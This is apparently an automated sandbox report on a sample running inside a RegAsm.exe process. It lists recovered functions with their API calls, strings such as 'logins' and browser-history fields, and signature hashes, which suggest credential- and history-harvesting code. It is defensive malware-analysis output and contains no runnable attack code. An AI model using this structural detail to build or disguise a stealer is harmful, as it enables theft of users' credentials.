                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                      • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                      • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                      • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                      Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                      • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
